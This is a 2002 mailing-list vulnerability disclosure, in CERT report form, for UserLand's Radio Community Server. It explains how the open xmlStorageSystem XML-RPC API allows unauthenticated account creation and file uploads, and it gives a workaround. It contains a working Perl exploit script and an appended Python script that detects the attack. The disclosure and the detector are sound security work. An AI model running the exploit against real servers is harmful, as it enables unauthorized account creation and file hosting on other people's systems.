OSEC

From: Gerhard Poul (gpoul_at_EUNET.AT)
Date: Sun Jul 07 2002 - 10:34:36 CDT


    Hi,

    This is a vulnerability Andreas and I found about eight weeks ago. This
    was then first reported to the vendor and CERT. CERT received it on
    5/10/02 at 8:01pm. They haven't yet done anything with it as far as I
    can tell. - I haven't received anything from them except for the
    automated responses.

    I've attached the same description here that I also sent to CERT.
     
    Best regards,
    Gerhard Poul

    CONTACT INFORMATION
    ===============================================================================

     Name : Gerhard Poul, Andreas Bolka
     E-mail : gpoul at eunet.at, andreas.bolka at gmx.net
     Phone / fax : [removed]
     Affiliation and address:

    Have you reported this to the vendor? [yes/no] yes.

            If so, please let us know whom you've contacted:

            Date of your report : 5/9/02
            Vendor contact name : Dave Winer
            Vendor contact phone :
            Vendor contact e-mail : dave@userland.com
            Vendor reference number :

    POLICY INFO
    ===============================================================================

            ___ Do not release my identity to your vendor contact.

    TECHNICAL INFO
    ===============================================================================
    If there is a CERT Vulnerability tracking number please put it here
    (otherwise leave blank): VU#______.

    Please describe the vulnerability.
    ---------------------------------

    This vulnerability makes it possible for an intruder to use the open
    SOAP or XML-RPC APIs published at
    http://www.soapware.org/xmlStorageSystem to create user accounts and
    upload random file data to any server running the Radio Community Server
    as published by UserLand Software Inc. at http://rcs.userland.com

    What is the impact of this vulnerability?
    ----------------------------------------

       a) What is the specific impact:

    Intruders can publish public files on a server without any special user
    permission over a network. - You don't need a user account or anything
    else on the target machine to make this work.

       b) How would you envision it being used in an attack scenario:

    This vulnerability enables attackers to publicly post files on any
    machine running the vulnerable software package.

    To your knowledge is the vulnerability currently being exploited?
    ----------------------------------------------------------------
            [yes/no] no.

    If there is an exploitation script available, please include it here.
    --------------------------------------------------------------------

    #!/usr/bin/perl

    use Frontier::Client;
    use MIME::Base64 qw(encode_base64);

    local($/) = undef; # slurp the whole input file at once

    # Details for the account that will be registered remotely.
    $email = 'John@test.com';
    $name = "John Doe";
    $password = "whateveryouwant.com";
    $filename = $ARGV[0];   # local file to upload, taken from the command line

    $server = Frontier::Client->new( 'url' => 'http://radiohost/RPC2',
                                     'debug' => 0 );
    $file = $server->base64(encode_base64(<>));

    # Step 1: register a new user; the server answers with the user number.
    $result = $server->call("xmlStorageSystem.registerUser", $email, $name,
                            $password, 81, 0, 0);
    $usernum = $result->{'usernum'};

    # Step 2: upload the file under that user; the server returns its URL.
    $result = $server->call("xmlStorageSystem.saveMultipleFiles", $usernum,
                            $password, [ $filename ], [ $file ]);
    $filename = $result->{'urlList'}->[0];

    print "New user with ID $usernum has been created\n";
    print "File has been uploaded to URI: $filename\n";

    Do you know what systems and/or configurations are vulnerable?
    -------------------------------------------------------------
            [yes/no] no.

            System :
            OS version :
            Verified/Guessed:

    Are you aware of any workarounds and/or fixes for this vulnerability?
    --------------------------------------------------------------------
            [yes/no] yes.

    There is a setting in the RCS software that restricts remote new user
    registrations. - By turning these remote registrations off, which are on
    by default, you can work around this problem but it will also restrict
    the usefulness of the community server.

    OTHER INFORMATION
    ===============================================================================

    This vulnerability is an inherent design flaw of the xmlStorageSystem
    XML-RPC or SOAP interface used between a Radio Client and a Radio
    Community Server. - It has to be fixed in the specification first to
    design a secure solution and every customer should be advised to
    shut down their Radio Community Servers immediately.

    The vendor has been contacted but does not agree with our vulnerability
    analysis.
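As an added example, not part of the original post: detection logic, written here in Python, that flags the register-then-upload sequence described in the report in captured XML-RPC POST bodies sent to an RCS /RPC2 endpoint. The trusted network range, client addresses and request bodies are all constructed for the example.

```python
"""Flag the register-then-upload pattern from the report in captured XML-RPC
POST bodies for an RCS /RPC2 endpoint. Added example, not the report's code;
the trusted range, client IPs and request bodies are all constructed."""
import ipaddress
import xmlrpc.client

# Assumed: clients in this range are the site's own Radio users.
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]
REGISTER = "xmlStorageSystem.registerUser"
SAVE = "xmlStorageSystem.saveMultipleFiles"


def method_call(name, *params):
    """Build an XML-RPC methodCall body (only used to construct samples)."""
    return xmlrpc.client.dumps(params, methodname=name)


# Constructed capture: (client IP, POST body) in arrival order. Parameter
# layouts mirror the two calls made by the script in the report.
CAPTURED = [
    ("192.0.2.10", method_call(REGISTER, "alice@example.invalid", "Alice",
                               "pw1", 81, 0, 0)),
    ("203.0.113.5", method_call(REGISTER, "john@example.invalid", "John Doe",
                                "pw2", 81, 0, 0)),
    ("203.0.113.5", method_call(SAVE, 42, "pw2", ["index.html"],
                                [xmlrpc.client.Binary(b"<h1>hi</h1>")])),
    ("198.51.100.9", method_call(SAVE, 7, "s3cret", ["notes.txt"],
                                 [xmlrpc.client.Binary(b"ok")])),
]


def find_abuse(captured, trusted_nets=TRUSTED_NETS):
    """Return (kind, client_ip, detail) findings: remote_registration for a
    registerUser call from outside trusted_nets, and
    upload_after_remote_registration for a saveMultipleFiles call from a
    client that registered remotely earlier in the same capture."""
    registered_remote, findings = set(), []
    for ip, body in captured:
        params, method = xmlrpc.client.loads(body)  # (params, methodname)
        addr = ipaddress.ip_address(ip)
        if method == REGISTER:
            if not any(addr in net for net in trusted_nets):
                registered_remote.add(ip)
                findings.append(("remote_registration", ip, params[0]))
        elif method == SAVE and ip in registered_remote:
            # params: usernum, password, [file names], [base64 bodies]
            findings.append(("upload_after_remote_registration", ip,
                             tuple(params[2])))
    return findings
```

Turning off remote registration, as the report's workaround suggests, removes the first finding type entirely; the second is the one to watch while the setting is still on.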